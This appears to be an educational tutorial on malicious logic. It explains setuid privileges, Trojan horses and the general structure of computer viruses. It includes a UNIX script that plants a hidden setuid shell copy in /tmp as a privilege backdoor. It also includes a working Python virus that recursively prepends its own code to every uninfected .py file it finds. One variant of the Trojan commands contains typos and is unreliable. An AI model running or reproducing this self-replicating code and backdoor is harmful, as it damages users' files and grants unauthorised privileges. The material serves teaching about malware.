NOTE: Using an online compiler is not going to work here. Please install Python 2.7x and cv2, argparse modules to actually try out this example.
Heya friends! Welcome back! Before continuing on with Malicious Logic, I request you to have a look at this great and informative article Worms, Viruses and Beyond!!
Now, this article will focus more on applications than theory of computer viruses, worms, and Trojan horses.
But, please note that this article is meant to be used for educational purposes only.I, in no way, promote the usage of viruses, worms, or trojan horses to attack computer systems and causing damage.
Malicious logic is a set of instructions (basically a program) that causes the violation of a security policy of a website/program/application, etc.
UNIX Script
cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*
In this example, we are assuming that “.” is in the path environment and the script has been named ls and is placed in the directory.
Analysing the script
This script creates a copy of the UNIX Shell that is setuid of the user executing this program. To understand setuid programs, we first need to understand how User Identity is stored in a UNIX OS.
In UNIX OS, user identity is usually represented as an integer between 0 and generally, 65,535. This number is also referred to as UID (Unique Identification Number). Now, what setuid programs do is that they create processes with UID of the owner and not of a third person executing the program. This means, that an executor will have the rights of the owner… This in itself is a possible vulnerability.
Coming back to our script, so a setuid copy of the UNIX shell was created. Later on, this program is deleted, and then the correct ls command (for listing the files and folders present in the current working directory) is executed.
Trojan Horses
Go back to the previous script… Suppose if someone (root) typed:
cp /bin/sh /tmp/.xxsh
chmod o+s,w+x /tmp.xxsh
If the script was typed deliberately, then it will result in a Trojan Horse.
Virus – A basic format
Most of the computer viruses follow the following basic script:
Beginvirus
if spread-condition TRUE then begin
for the target files begin
if target affected TRUE then begin
Determine where to place virus instructions
Copy the virus instructions
Modify target to spread the virus later
End if
End for
End if
Perform some other instruction(s) //Optional
Go back to beginning
Endvirus
Basically, every computer virus has two phases –
- Insertion phase – in this phase, the virus inserts itself into the target.
- Execution phase- in this phase, the virus performs some actions.
Let’s take a look at a real virus in Python. Now this is not an actual virus which will cause corruption files, deletion of system files, etc. but just a simple harmless virus.
import os, datetime, inspect
DATA_TO_INSERT = "GEEKSFORGEEKS"
def search(path):
filestoinfect = []
filelist = os.listdir(path)
for filename in filelist:
if os.path.isdir(path+"/"+filename):
filestoinfect.extend(search(path+"/"+filename))
elif filename[-3:] == ".py":
infected = False
for line in open(path+"/"+filename):
if DATA_TO_INSERT in line:
infected = True
break
if infected == False:
filestoinfect.append(path+"/"+filename)
return filestoinfect
def infect(filestoinfect):
target_file = inspect.currentframe().f_code.co_filename
virus = open(os.path.abspath(target_file))
virusstring = ""
for i,line in enumerate(virus):
if i>=0 and i <41:
virusstring += line
virus.close
for fname in filestoinfect:
f = open(fname)
temp = f.read()
f.close()
f = open(fname,"w")
f.write(virusstring + temp)
f.close()
def explode():
if datetime.datetime.now().month == 4 and datetime.datetime.now().day == 1:
print ("HAPPY APRIL FOOL'S DAY!!")
filestoinfect = search(os.path.abspath(""))
infect(filestoinfect)
explode()
|
Now, this is quite a safe virus But, the basic format and working is the same.
Also, there are various types of computer virus – Boot sector infectors, executable infectors, multipartite virus, TSR virus, Stealth virus, Encrypted virus, polymorphic virus, macro virus.
Now, I won’t go into the details and will just stop here. That’s all from my side!